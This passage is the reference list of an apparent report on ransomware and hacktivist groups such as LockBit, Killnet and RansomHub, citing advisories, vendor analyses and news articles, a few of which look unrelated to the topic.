  37. lockbit-3-analyst-note.pdf – HHS.gov, accessed April 21, 2025, https://www.hhs.gov/sites/default/files/lockbit-3-analyst-note.pdf
  38. LockBit Takedown Advisory Alert – What We Know – Lumu Technologies, accessed April 21, 2025, https://lumu.io/lockbit-takedown-advisory-alert-what-we-know/
  39. LockBit Analysis – Truesec, accessed April 21, 2025, https://www.truesec.com/hub/blog/lockbit-analysis
  40. Ransomware & Extortion Activity in 2024: A Year in Review | Analyst1, accessed April 21, 2025, https://analyst1.com/ransomware-extortion-activity-in-2024-a-year-in-review/
  41. Learning from the LockBit Takedown – Akamai, accessed April 21, 2025, https://www.akamai.com/blog/security/learning-from-the-lockbit-takedown
  42. The LockBit takedown – Global Initiative Against Transnational Organized Crime, accessed April 21, 2025, https://globalinitiative.net/analysis/the-lockbit-takedown-law-enforcement-trolls-ransomware-gang/
  43. LockBit: The World’s Most Active Ransomware Group | Flashpoint, accessed April 21, 2025, https://flashpoint.io/blog/lockbit/
  44. #StopRansomware: LockBit 3.0 | CISA, accessed April 21, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
  45. Cyber Dimensions – CyberPeace Institute, accessed April 21, 2025, https://cyberpeaceinstitute.org/wp-content/uploads/2023/05/Ukraine-Report-Q1_FINAL.pdf
  46. Killnet: Analysis of Attacks from a Prominent Pro-Russian Hacktivist Group – Forescout, accessed April 21, 2025, https://www.forescout.com/blog/killnet-analysis-of-attacks-from-a-prominent-pro-russian-hacktivist-group/
  47. Assemblea SIT-ER 2019 – WordPress, accessed April 21, 2025, https://www.sit-er.it/2019/10/26/assemblea-sit-er-2019/
  48. Buy Web Hosting in Kent, United Kingdom – GlobexCamHost, accessed April 21, 2025, https://www.globexcamhost.com/en/webhosting/buy-standard-web-hosting-in-kent-england-united_kingdom
  49. WordPress Resources at SiteGround – Studio Psicologia Martinengo, accessed April 21, 2025, https://studiopsicologiamartinengo.it/wordpress-resources-at-siteground/
  50. Explore.org- Rising up in Palm Springs, accessed April 21, 2025, https://blog.explore.org/explore-org-rising-up-in-palm-springs/
  51. The Purge: Anarchy Review – Next Projection, accessed April 21, 2025, https://nextprojection.com/2014/07/18/purge-anarchy-review/
  52. COMMERCE (MODEL KEPERCAYAAN UNTUK E-DAGANG BERASASKAN PERSEPSI PENGGUNA) No Vot 78196 – Eprint UTM, accessed April 21, 2025, http://eprints.utm.my/9788/1/78196.pdf
  53. Anonymous (hacker group) – Wikipedia, accessed April 21, 2025, https://en.wikipedia.org/wiki/Anonymous_(hacker_group)
  54. Modern Approach to Attributing Hacktivist Groups – Check Point Research, accessed April 21, 2025, https://research.checkpoint.com/2025/modern-approach-to-attributing-hacktivist-groups/
  55. What is Hacktivism | Types, Ethics, History & Examples – Imperva, accessed April 21, 2025, https://www.imperva.com/learn/application-security/hacktivism/
  56. NEWS IN BRIEF – UKRAINE CONFLICT – BATTLESPACE Updates, accessed April 21, 2025, https://battle-updates.com/update/news-in-brief-ukraine-conflict-47/
  57. Pro-Russian Hacktivist Group Claims 6600 Attacks Targeting Europe, accessed April 21, 2025, https://www.infosecurity-magazine.com/news/pro-russian-hacktivist-attacks/
  58. Ransomware in focus: Meet NightSpire – S-RM, accessed April 21, 2025, https://www.s-rminform.com/latest-thinking/ransomware-in-focus-meet-nightspire
  59. Threat Intelligence Report Mar 25th – Mar 31st, 2025 – Red Piranha, accessed April 21, 2025, https://redpiranha.net/news/threat-intelligence-report-march-25-march-31-2025
  60. Ransomware Report 2023: targets, motives, and trends – Outpost24, accessed April 21, 2025, https://outpost24.com/blog/ransomware-report-2023-targets-motives-and-trends/
  61. TRACKING RANSOMWARE – MARCH 2025 – CYFIRMA, accessed April 21, 2025, https://www.cyfirma.com/research/tracking-ransomware-march-2025
  62. The rising tide: A 2024 retrospective of hacktivism – Silobreaker, accessed April 21, 2025, https://www.silobreaker.com/blog/hacktivism-ransomware-and-geopolitics-2024-in-review/
  63. A Tempest at RansomHub: Major new cyber threat group expands – S-RM, accessed April 21, 2025, https://www.s-rminform.com/latest-thinking/a-tempest-at-ransomhub-major-new-cyber-threat-group-expands

Related Posts